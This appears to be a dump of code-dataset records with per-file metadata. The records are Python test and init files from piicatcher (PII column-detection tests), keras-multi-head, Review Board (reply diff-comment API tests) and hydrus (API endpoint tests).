schema_name=schemata[0].name,
table_name="partial_data_type",
column_name="ssn",
)
assert partial_data_type_ssn.updated_at > first_task.updated_at
assert (
second_task.updated_at - partial_data_type_ssn.updated_at
) < datetime.timedelta(seconds=3)
def test_incremental_column_generator(setup_incremental):
catalog, source_id = setup_incremental
with catalog.managed_session:
source = catalog.get_source_by_id(source_id)
tasks = catalog.get_tasks_by_app_name("piicatcher.{}".format(source.name))
count = 0
for tpl in column_generator(catalog=catalog, source=source):
count += 1
assert count == 24
count = 0
for tpl in column_generator(
catalog=catalog, source=source, last_run=tasks[0].updated_at
):
count += 1
assert count == 8
def test_incremental_data_generator(setup_incremental):
catalog, source_id = setup_incremental
with catalog.managed_session:
source = catalog.get_source_by_id(source_id)
tasks = catalog.get_tasks_by_app_name("piicatcher.{}".format(source.name))
count = 0
for tpl in data_generator(catalog=catalog, source=source):
count += 1
assert count == 434
count = 0
for tpl in data_generator(
catalog=catalog, source=source, last_run=tasks[0].updated_at
):
count += 1
assert count == 14
def test_incremental_tabular_output(setup_incremental):
catalog, source_id = setup_incremental
with catalog.managed_session:
source = catalog.get_source_by_id(source_id)
tasks = catalog.get_tasks_by_app_name("piicatcher.{}".format(source.name))
assert len(tasks) == 2
first_task = tasks[0]
second_task = tasks[1]
# List all PII columns
op = output_tabular(catalog=catalog, source=source)
assert len(op) == 9
# List all PII columns with include_filter
op = output_tabular(
catalog=catalog, source=source, include_table_regex=["partial_data_type"]
)
assert len(op) == 1
# List after first task.
op = output_tabular(
catalog=catalog, source=source, last_run=first_task.updated_at
)
assert len(op) == 1
# List for second task
op = output_tabular(
catalog=catalog, source=source, last_run=second_task.updated_at
)
assert len(op) == 0
sqlite_all = {
"name": "sqlite_src",
"schemata": [
{
"name": "",
"tables": [
{
"columns": [
{
"data_type": "VARCHAR(255)",
"name": "address",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Address",
"sort_order": 0,
},
{
"data_type": "VARCHAR(255)",
"name": "city",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Address",
"sort_order": 6,
},
{
"data_type": "VARCHAR(255)",
"name": "email",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Email",
"sort_order": 7,
},
{
"data_type": "VARCHAR(255)",
"name": "fname",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Person",
"sort_order": 8,
},
{
"data_type": "VARCHAR(255)",
"name": "gender",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Gender",
"sort_order": 9,
},
{
"data_type": "VARCHAR(255)",
"name": "lname",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Person",
"sort_order": 11,
},
{
"data_type": "VARCHAR(255)",
"name": "maiden_name",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Person",
"sort_order": 12,
},
{
"data_type": "VARCHAR(255)",
"name": "state",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Address",
"sort_order": 14,
},
],
"name": "sample",
},
{
"columns": [
{
"data_type": "text",
"name": "ssn",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "SSN",
"sort_order": 1,
}
],
"name": "partial_data_type",
},
],
}
],
}
pg_all = {
"name": "pg_src",
"schemata": [
{
"name": "public",
"tables": [
{
"columns": [
{
"data_type": "varchar",
"name": "gender",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Gender",
"sort_order": 1,
},
{
"data_type": "varchar",
"name": "maiden_name",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Person",
"sort_order": 3,
},
{
"data_type": "varchar",
"name": "lname",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Person",
"sort_order": 4,
},
{
"data_type": "varchar",
"name": "fname",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Person",
"sort_order": 5,
},
{
"data_type": "varchar",
"name": "address",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Address",
"sort_order": 6,
},
{
"data_type": "varchar",
"name": "city",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Address",
"sort_order": 7,
},
{
"data_type": "varchar",
"name": "state",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Address",
"sort_order": 8,
},
{
"data_type": "varchar",
"name": "email",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Email",
"sort_order": 11,
},
],
"name": "sample",
},
{
"columns": [
{
"data_type": "text",
"name": "ssn",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "SSN",
"sort_order": 1,
}
],
"name": "partial_data_type",
},
],
}
],
}
mysql_all = {
"name": "mysql_src",
"schemata": [
{
"name": "piidb",
"tables": [
{
"columns": [
{
"data_type": "varchar",
"name": "email",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Email",
"sort_order": 3,
},
{
"data_type": "varchar",
"name": "gender",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Gender",
"sort_order": 8,
},
{
"data_type": "varchar",
"name": "maiden_name",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Person",
"sort_order": 10,
},
{
"data_type": "varchar",
"name": "lname",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Person",
"sort_order": 11,
},
{
"data_type": "varchar",
"name": "fname",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Person",
"sort_order": 12,
},
{
"data_type": "varchar",
"name": "address",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Address",
"sort_order": 13,
},
{
"data_type": "varchar",
"name": "city",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Address",
"sort_order": 14,
},
{
"data_type": "varchar",
"name": "state",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "Address",
"sort_order": 15,
},
],
"name": "sample",
},
{
"columns": [
{
"data_type": "text",
"name": "ssn",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "SSN",
"sort_order": 1,
}
],
"name": "partial_data_type",
},
],
}
],
}
sqlite_one = {
"name": "sqlite_src",
"schemata": [
{
"name": "",
"tables": [
{
"columns": [
{
"data_type": "text",
"name": "ssn",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "SSN",
"sort_order": 1,
}
],
"name": "partial_data_type",
}
],
}
],
}
pg_one = {
"name": "pg_src",
"schemata": [
{
"name": "public",
"tables": [
{
"columns": [
{
"data_type": "text",
"name": "ssn",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "SSN",
"sort_order": 1,
}
],
"name": "partial_data_type",
}
],
}
],
}
mysql_one = {
"name": "mysql_src",
"schemata": [
{
"name": "piidb",
"tables": [
{
"columns": [
{
"data_type": "text",
"name": "ssn",
"pii_plugin": "ColumnNameRegexDetector",
"pii_type": "SSN",
"sort_order": 1,
}
],
"name": "partial_data_type",
}
],
}
],
}
def test_incremental_dict_output(setup_incremental):
catalog, source_id = setup_incremental
with catalog.managed_session:
source = catalog.get_source_by_id(source_id)
tasks = catalog.get_tasks_by_app_name("piicatcher.{}".format(source.name))
assert len(tasks) == 2
first_task = tasks[0]
second_task = tasks[1]
# List all PII columns
op = output_dict(catalog=catalog, source=source)
if source.source_type == "sqlite":
assert op == sqlite_all
elif source.source_type == "postgresql":
assert op == pg_all
elif source.source_type == "mysql":
assert op == mysql_all
# include filter
op = output_dict(
catalog=catalog, source=source, include_table_regex=["partial_data_type"]
)
if source.source_type == "sqlite":
assert op == sqlite_one
elif source.source_type == "postgresql":
assert op == pg_one
elif source.source_type == "mysql":
assert op == mysql_one
# List after first task.
op = output_dict(catalog=catalog, source=source, last_run=first_task.updated_at)
if source.source_type == "sqlite":
assert op == sqlite_one
elif source.source_type == "postgresql":
assert op == pg_one
elif source.source_type == "mysql":
assert op == mysql_one
# List for second task
op = output_dict(
catalog=catalog, source=source, last_run=second_task.updated_at
)
assert op == {}
@pytest.mark.order(-1)
def test_full_scan(setup_incremental):
catalog, source_id = setup_incremental
with catalog.managed_session:
source = catalog.get_source_by_id(source_id)
time.sleep(1)
scan_database(catalog=catalog, source=source, incremental=False)
# there should be 3 tasks.
tasks = catalog.get_tasks_by_app_name("piicatcher.{}".format(source.name))
assert len(tasks) == 3
schemata = catalog.search_schema(source_like=source.name, schema_like="%")
updated_cols = 0
for table_name in [
"no_pii",
"full_pii",
"partial_pii",
"partial_data_type",
"sample",
]:
table = catalog.get_table(
source_name=source.name,
schema_name=schemata[0].name,
table_name=table_name,
)
updated_cols += len(
list(
catalog.get_columns_for_table(table, newer_than=tasks[1].updated_at)
)
)
assert updated_cols == 11
| 34.503401 | 120 | 0.421284 | 1,585 | 20,288 | 5.102208 | 0.093375 | 0.051441 | 0.118709 | 0.129838 | 0.86571 | 0.853592 | 0.823791 | 0.792754 | 0.750711 | 0.720415 | 0 | 0.010828 | 0.481073 | 20,288 | 587 | 121 | 34.562181 | 0.757314 | 0.021885 | 0 | 0.599214 | 0 | 0 | 0.163591 | 0.034796 | 0 | 0 | 0 | 0 | 0.068762 | 1 | 0.013752 | false | 0 | 0.019646 | 0 | 0.033399 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
99d1a3e4f7301783f0156fbb00151839f2ac5baf | 111 | py | Python | keras_multi_head/__init__.py | SchenbergZY/keras-multi-head | f0004c5bb607e96299352605f064849b88a2a131 | [
"MIT"
] | null | null | null | keras_multi_head/__init__.py | SchenbergZY/keras-multi-head | f0004c5bb607e96299352605f064849b88a2a131 | [
"MIT"
] | null | null | null | keras_multi_head/__init__.py | SchenbergZY/keras-multi-head | f0004c5bb607e96299352605f064849b88a2a131 | [
"MIT"
] | null | null | null | from .multi_head import MultiHead
from .multi_head_attention import MultiHeadAttention
__version__ = '0.23.0'
| 22.2 | 52 | 0.828829 | 15 | 111 | 5.666667 | 0.666667 | 0.211765 | 0.305882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040404 | 0.108108 | 111 | 4 | 53 | 27.75 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0.054054 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
99e116b7237f03eff1609054291f1cb063db29a8 | 10,510 | py | Python | reviewboard/webapi/tests/test_review_reply_diff_comment.py | pombredanne/reviewboard | 15f1d7236ec7a5cb4778ebfeb8b45d13a46ac71d | [
"MIT"
] | null | null | null | reviewboard/webapi/tests/test_review_reply_diff_comment.py | pombredanne/reviewboard | 15f1d7236ec7a5cb4778ebfeb8b45d13a46ac71d | [
"MIT"
] | null | null | null | reviewboard/webapi/tests/test_review_reply_diff_comment.py | pombredanne/reviewboard | 15f1d7236ec7a5cb4778ebfeb8b45d13a46ac71d | [
"MIT"
] | null | null | null | from reviewboard.reviews.models import Comment
from reviewboard.webapi.resources import resources
from reviewboard.webapi.tests.base import BaseWebAPITestCase
from reviewboard.webapi.tests.mimetypes import (
review_reply_diff_comment_item_mimetype,
review_reply_diff_comment_list_mimetype)
from reviewboard.webapi.tests.mixins import (
BasicTestsMetaclass,
ReviewRequestChildItemMixin,
ReviewRequestChildListMixin)
from reviewboard.webapi.tests.mixins_comment import (
CommentReplyItemMixin,
CommentReplyListMixin)
from reviewboard.webapi.tests.urls import (
get_review_reply_diff_comment_item_url,
get_review_reply_diff_comment_list_url)
class ResourceListTests(CommentReplyListMixin, ReviewRequestChildListMixin,
BaseWebAPITestCase, metaclass=BasicTestsMetaclass):
"""Testing the ReviewReplyDiffCommentResource list APIs."""
fixtures = ['test_users', 'test_scmtools']
sample_api_url = \
'review-requests/<id>/reviews/<id>/replies/<id>/diff-comments/'
resource = resources.review_reply_diff_comment
def setup_review_request_child_test(self, review_request):
if not review_request.repository_id:
# The group tests don't create a repository by default.
review_request.repository = self.create_repository()
review_request.save()
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review_request.publish(review_request.submitter)
review = self.create_review(review_request, publish=True)
self.create_diff_comment(review, filediff)
reply = self.create_reply(review, user=self.user)
return (get_review_reply_diff_comment_list_url(reply),
review_reply_diff_comment_list_mimetype)
def compare_item(self, item_rsp, comment):
self.assertEqual(item_rsp['id'], comment.pk)
self.assertEqual(item_rsp['text'], comment.text)
if comment.rich_text:
self.assertEqual(item_rsp['text_type'], 'markdown')
else:
self.assertEqual(item_rsp['text_type'], 'plain')
#
# HTTP GET tests
#
def setup_basic_get_test(self, user, with_local_site, local_site_name,
populate_items):
review_request = self.create_review_request(
create_repository=True,
with_local_site=with_local_site,
submitter=user,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request, user=user)
comment = self.create_diff_comment(review, filediff)
reply = self.create_reply(review, user=user)
if populate_items:
items = [
self.create_diff_comment(reply, filediff, reply_to=comment),
]
else:
items = []
return (get_review_reply_diff_comment_list_url(reply, local_site_name),
review_reply_diff_comment_list_mimetype,
items)
#
# HTTP POST tests
#
def setup_basic_post_test(self, user, with_local_site, local_site_name,
post_valid_data):
review_request = self.create_review_request(
create_repository=True,
with_local_site=with_local_site,
submitter=user,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request, user=user, publish=True)
comment = self.create_diff_comment(review, filediff)
reply = self.create_reply(review, user=user)
return (get_review_reply_diff_comment_list_url(reply, local_site_name),
review_reply_diff_comment_item_mimetype,
{
'reply_to_id': comment.pk,
'text': 'Test comment',
},
[reply, comment])
def check_post_result(self, user, rsp, reply, comment):
reply_comment = Comment.objects.get(pk=rsp['diff_comment']['id'])
self.assertEqual(reply_comment.text, 'Test comment')
self.assertEqual(reply_comment.reply_to, comment)
self.assertFalse(reply_comment.rich_text)
self.compare_item(rsp['diff_comment'], reply_comment)
def test_post_with_http_303(self):
"""Testing the
POST review-requests/<id>/reviews/<id>/replies/<id>/diff-comments/ API
with second instance of same reply
"""
comment_text = "My New Comment Text"
review_request = self.create_review_request(
create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request, publish=True)
comment = self.create_diff_comment(review, filediff)
reply = self.create_reply(review, user=self.user)
reply_comment = self.create_diff_comment(reply, filediff,
reply_to=comment)
# Now do it again.
rsp = self.api_post(
get_review_reply_diff_comment_list_url(reply),
{
'reply_to_id': comment.pk,
'text': comment_text
},
expected_status=303,
expected_mimetype=review_reply_diff_comment_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
reply_comment = Comment.objects.get(pk=rsp['diff_comment']['id'])
self.assertEqual(reply_comment.text, comment_text)
class ResourceItemTests(CommentReplyItemMixin, ReviewRequestChildItemMixin,
BaseWebAPITestCase, metaclass=BasicTestsMetaclass):
"""Testing the ReviewReplyDiffCommentResource item APIs."""
fixtures = ['test_users', 'test_scmtools']
sample_api_url = \
'review-requests/<id>/reviews/<id>/replies/<id>/diff-comments/<id>/'
resource = resources.review_reply_diff_comment
def setup_review_request_child_test(self, review_request):
if not review_request.repository_id:
# The group tests don't create a repository by default.
review_request.repository = self.create_repository()
review_request.save()
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review_request.publish(review_request.submitter)
review = self.create_review(review_request, publish=True)
self.create_diff_comment(review, filediff)
reply = self.create_reply(review, user=self.user)
return (get_review_reply_diff_comment_list_url(reply),
review_reply_diff_comment_list_mimetype)
def compare_item(self, item_rsp, comment):
self.assertEqual(item_rsp['id'], comment.pk)
self.assertEqual(item_rsp['text'], comment.text)
if comment.rich_text:
self.assertEqual(item_rsp['text_type'], 'markdown')
else:
self.assertEqual(item_rsp['text_type'], 'plain')
#
# HTTP DELETE tests
#
def setup_basic_delete_test(self, user, with_local_site, local_site_name):
review_request = self.create_review_request(
create_repository=True,
with_local_site=with_local_site,
submitter=user,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request, user=user, publish=True)
comment = self.create_diff_comment(review, filediff)
reply = self.create_reply(review, user=user)
reply_comment = self.create_diff_comment(reply, filediff,
reply_to=comment)
return (
get_review_reply_diff_comment_item_url(
reply, reply_comment.pk, local_site_name),
[reply_comment, reply]
)
def check_delete_result(self, user, reply_comment, reply):
self.assertNotIn(reply, reply.comments.all())
#
# HTTP GET tests
#
def setup_basic_get_test(self, user, with_local_site, local_site_name):
review_request = self.create_review_request(
create_repository=True,
with_local_site=with_local_site,
submitter=user,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request, user=user, publish=True)
comment = self.create_diff_comment(review, filediff)
reply = self.create_reply(review, user=user)
reply_comment = self.create_diff_comment(
reply, filediff, reply_to=comment)
return (
get_review_reply_diff_comment_item_url(
reply, reply_comment.pk, local_site_name),
review_reply_diff_comment_item_mimetype,
reply_comment
)
#
# HTTP PUT tests
#
def setup_basic_put_test(self, user, with_local_site, local_site_name,
put_valid_data):
review_request = self.create_review_request(
create_repository=True,
with_local_site=with_local_site,
submitter=user,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request, user=user, publish=True)
comment = self.create_diff_comment(review, filediff)
reply = self.create_reply(review, user=user)
reply_comment = self.create_diff_comment(reply, filediff,
reply_to=comment)
return (
get_review_reply_diff_comment_item_url(
reply, reply_comment.pk, local_site_name),
review_reply_diff_comment_item_mimetype,
{
'text': 'Test comment',
},
reply_comment,
[])
def check_put_result(self, user, item_rsp, comment, *args):
comment = Comment.objects.get(pk=comment.pk)
self.assertEqual(item_rsp['id'], comment.pk)
self.assertEqual(item_rsp['text'], 'Test comment')
self.assertEqual(comment.text, 'Test comment')
self.assertFalse(comment.rich_text)
| 39.216418 | 79 | 0.654995 | 1,169 | 10,510 | 5.560308 | 0.098375 | 0.081538 | 0.048462 | 0.071077 | 0.824615 | 0.797538 | 0.746769 | 0.726154 | 0.720462 | 0.685692 | 0 | 0.000773 | 0.261085 | 10,510 | 267 | 80 | 39.363296 | 0.836209 | 0.040913 | 0 | 0.655172 | 0 | 0 | 0.04111 | 0.012672 | 0 | 0 | 0 | 0 | 0.08867 | 1 | 0.064039 | false | 0 | 0.034483 | 0 | 0.172414 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
99ea8df2c9e8d043195f4da9cedf839028c0de5d | 197 | py | Python | src/envs/__init__.py | jainraj/CISR_NeurIPS20 | 027957e4a26a36f6501c4f0e5e73cb9d78a53e66 | [
"MIT"
] | 16 | 2020-11-04T14:44:16.000Z | 2022-02-16T08:08:23.000Z | src/envs/__init__.py | jainraj/CISR_NeurIPS20 | 027957e4a26a36f6501c4f0e5e73cb9d78a53e66 | [
"MIT"
] | 2 | 2021-03-23T12:07:53.000Z | 2021-12-22T14:30:59.000Z | src/envs/__init__.py | jainraj/CISR_NeurIPS20 | 027957e4a26a36f6501c4f0e5e73cb9d78a53e66 | [
"MIT"
] | 7 | 2020-11-17T03:20:00.000Z | 2022-03-31T15:53:58.000Z | from src.envs.frozen_lake.utils import *
from src.envs.CMDP import CMDP, LagrangianMDP, LagrangianMDPMonitor
from src.envs.frozen_lake.frozen_lake_custom import *
from src.envs.dummy_envs import *
| 39.4 | 67 | 0.832487 | 30 | 197 | 5.3 | 0.4 | 0.176101 | 0.27673 | 0.213836 | 0.264151 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091371 | 197 | 4 | 68 | 49.25 | 0.888268 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8246e38f21bcb46e020f248157401bcc92b6f2e7 | 45,802 | py | Python | hydrus/tests/test_app.py | vcode11/hydrus | 4ed8ada7ed8fd7d8897e744bae410b312f4cfb83 | [
"MIT"
] | 1 | 2019-12-04T12:54:21.000Z | 2019-12-04T12:54:21.000Z | hydrus/tests/test_app.py | vcode11/hydrus | 4ed8ada7ed8fd7d8897e744bae410b312f4cfb83 | [
"MIT"
] | 3 | 2019-12-21T04:15:23.000Z | 2020-04-07T05:11:05.000Z | hydrus/tests/test_app.py | vcode11/hydrus | 4ed8ada7ed8fd7d8897e744bae410b312f4cfb83 | [
"MIT"
] | null | null | null | """Test for checking if the response format is proper. Run test_crud before running this."""
import unittest
import random
import string
import json
import re
import uuid
from hydrus.app_factory import app_factory
from hydrus.socketio_factory import create_socket
from hydrus.utils import set_session, set_doc, set_api_name, set_page_size
from hydrus.data import doc_parse, crud
from hydra_python_core import doc_maker
from hydra_python_core.doc_writer import HydraLink
from hydrus.samples import doc_writer_sample
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
from hydrus.data.db_models import Base
def gen_dummy_object(class_title, doc):
"""Create a dummy object based on the definitions in the API Doc.
:param class_title: Title of the class whose object is being created.
:param doc: ApiDoc.
:return: A dummy object of class `class_title`.
"""
object_ = {
"@type": class_title
}
for class_path in doc.parsed_classes:
if class_title == doc.parsed_classes[class_path]["class"].title:
for prop in doc.parsed_classes[class_path]["class"].supportedProperty:
if isinstance(prop.prop, HydraLink) or prop.write is False:
continue
if "vocab:" in prop.prop:
prop_class = prop.prop.replace("vocab:", "")
object_[prop.title] = gen_dummy_object(prop_class, doc)
else:
object_[prop.title] = ''.join(random.choice(
string.ascii_uppercase + string.digits) for _ in range(6))
return object_
class ViewsTestCase(unittest.TestCase):
"""Test Class for the app."""
@classmethod
def setUpClass(self):
"""Database setup before the tests."""
print("Creating a temporary database...")
engine = create_engine('sqlite:///:memory:')
Base.metadata.create_all(engine)
session = scoped_session(sessionmaker(bind=engine))
self.session = session
self.API_NAME = "demoapi"
self.page_size = 1
self.HYDRUS_SERVER_URL = "http://hydrus.com/"
self.app = app_factory(self.API_NAME)
self.socketio = create_socket(self.app, self.session)
print("going for create doc")
self.doc = doc_maker.create_doc(
doc_writer_sample.api_doc.generate(),
self.HYDRUS_SERVER_URL,
self.API_NAME)
test_classes = doc_parse.get_classes(self.doc.generate())
test_properties = doc_parse.get_all_properties(test_classes)
doc_parse.insert_classes(test_classes, self.session)
doc_parse.insert_properties(test_properties, self.session)
print("Classes and properties added successfully.")
print("Setting up hydrus utilities... ")
self.api_name_util = set_api_name(self.app, self.API_NAME)
self.session_util = set_session(self.app, self.session)
self.doc_util = set_doc(self.app, self.doc)
self.page_size_util = set_page_size(self.app, self.page_size)
self.client = self.app.test_client()
print("Creating utilities context... ")
self.api_name_util.__enter__()
self.session_util.__enter__()
self.doc_util.__enter__()
self.client.__enter__()
print("Setup done, running tests...")
@classmethod
def tearDownClass(self):
"""Tear down temporary database and exit utilities"""
self.client.__exit__(None, None, None)
self.doc_util.__exit__(None, None, None)
self.session_util.__exit__(None, None, None)
self.api_name_util.__exit__(None, None, None)
self.session.close()
def setUp(self):
for class_ in self.doc.parsed_classes:
link_props = {}
class_title = self.doc.parsed_classes[class_]["class"].title
dummy_obj = gen_dummy_object(class_title, self.doc)
for supportedProp in self.doc.parsed_classes[class_]['class'].supportedProperty:
if isinstance(supportedProp.prop, HydraLink):
class_name = supportedProp.prop.range.replace("vocab:", "")
for collection_path in self.doc.collections:
coll_class = self.doc.collections[
collection_path]['collection'].class_.title
if class_name == coll_class:
id_ = str(uuid.uuid4())
crud.insert(
gen_dummy_object(class_name, self.doc),
id_=id_,
session=self.session)
link_props[supportedProp.title] = id_
dummy_obj[supportedProp.title] = "{}/{}/{}".format(
self.API_NAME, collection_path, id_)
crud.insert(
dummy_obj,
id_=str(
uuid.uuid4()),
link_props=link_props,
session=self.session)
# If it's a collection class then add an extra object so
# we can test pagination thoroughly.
if class_ in self.doc.collections:
crud.insert(
dummy_obj,
id_=str(
uuid.uuid4()),
session=self.session)
def test_Index(self):
"""Test for the index."""
response_get = self.client.get("/{}".format(self.API_NAME))
endpoints = json.loads(response_get.data.decode('utf-8'))
response_post = self.client.post(
"/{}".format(self.API_NAME), data=dict(foo="bar"))
response_put = self.client.put(
"/{}".format(self.API_NAME), data=dict(foo="bar"))
response_delete = self.client.delete("/{}".format(self.API_NAME))
assert "@context" in endpoints
assert endpoints["@id"] == "/{}".format(self.API_NAME)
assert endpoints["@type"] == "EntryPoint"
assert response_get.status_code == 200
assert response_post.status_code == 405
assert response_put.status_code == 405
assert response_delete.status_code == 405
def test_EntryPoint_context(self):
"""Test for the EntryPoint context."""
response_get = self.client.get(
"/{}/contexts/EntryPoint.jsonld".format(self.API_NAME))
response_get_data = json.loads(response_get.data.decode('utf-8'))
response_post = self.client.post(
"/{}/contexts/EntryPoint.jsonld".format(self.API_NAME), data={})
response_delete = self.client.delete(
"/{}/contexts/EntryPoint.jsonld".format(self.API_NAME))
assert response_get.status_code == 200
assert "@context" in response_get_data
assert response_post.status_code == 405
assert response_delete.status_code == 405
def test_Vocab(self):
"""Test the vocab."""
response_get = self.client.get("/{}/vocab#".format(self.API_NAME))
response_get_data = json.loads(response_get.data.decode('utf-8'))
assert "@context" in response_get_data
assert response_get_data["@type"] == "ApiDocumentation"
assert response_get_data["@id"] == "{}{}/vocab".format(
self.HYDRUS_SERVER_URL, self.API_NAME)
assert response_get.status_code == 200
response_delete = self.client.delete(
"/{}/vocab#".format(self.API_NAME))
assert response_delete.status_code == 405
response_put = self.client.put(
"/{}/vocab#".format(self.API_NAME), data=json.dumps(dict(foo='bar')))
assert response_put.status_code == 405
response_post = self.client.post(
"/{}/vocab#".format(self.API_NAME), data=json.dumps(dict(foo='bar')))
assert response_post.status_code == 405
def test_Collections_GET(self):
"""Test GET on collection endpoints."""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
collection_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if collection_name in self.doc.collections:
response_get = self.client.get(endpoints[endpoint])
# pdb.set_trace()
assert response_get.status_code == 200
response_get_data = json.loads(
response_get.data.decode('utf-8'))
assert "@context" in response_get_data
assert "@id" in response_get_data
assert "@type" in response_get_data
assert "members" in response_get_data
# Check the item URI has the valid format, so it can be dereferenced
if len(response_get_data["members"]) > 0:
for item in response_get_data["members"]:
class_type = item["@type"]
if class_type in self.doc.parsed_classes:
class_ = self.doc.parsed_classes[class_type]["class"]
class_methods = [
x.method for x in class_.supportedOperation]
if "GET" in class_methods:
item_response = self.client.get(
response_get_data["members"][0]["@id"])
assert item_response.status_code == 200
def test_pagination(self):
"""Test basic pagination"""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
collection_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if collection_name in self.doc.collections:
response_get = self.client.get(endpoints[endpoint])
assert response_get.status_code == 200
response_get_data = json.loads(
response_get.data.decode('utf-8'))
assert "view" in response_get_data
assert "first" in response_get_data["view"]
assert "last" in response_get_data["view"]
if "next" in response_get_data["view"]:
response_next = self.client.get(response_get_data["view"]["next"])
assert response_next.status_code == 200
response_next_data = json.loads(
response_next.data.decode('utf-8'))
assert "previous" in response_next_data["view"]
break
def test_Collections_PUT(self):
"""Test insert data to the collection."""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
collection_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if collection_name in self.doc.collections:
collection = self.doc.collections[collection_name]["collection"]
dummy_object = gen_dummy_object(
collection.class_.title, self.doc)
good_response_put = self.client.put(
endpoints[endpoint], data=json.dumps(dummy_object))
assert good_response_put.status_code == 201
def test_object_POST(self):
"""Test replace of a given object using ID."""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
collection_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if collection_name in self.doc.collections:
collection = self.doc.collections[collection_name]["collection"]
class_ = self.doc.parsed_classes[collection.class_.title]["class"]
class_methods = [x.method for x in class_.supportedOperation]
dummy_object = gen_dummy_object(
collection.class_.title, self.doc)
initial_put_response = self.client.put(
endpoints[endpoint], data=json.dumps(dummy_object))
assert initial_put_response.status_code == 201
response = json.loads(
initial_put_response.data.decode('utf-8'))
regex = r'(.*)ID (.{36})* (.*)'
matchObj = re.match(regex, response["description"])
assert matchObj is not None
id_ = matchObj.group(2)
if "POST" in class_methods:
dummy_object = gen_dummy_object(
collection.class_.title, self.doc)
post_replace_response = self.client.post(
'{}/{}'.format(endpoints[endpoint], id_), data=json.dumps(dummy_object))
assert post_replace_response.status_code == 200
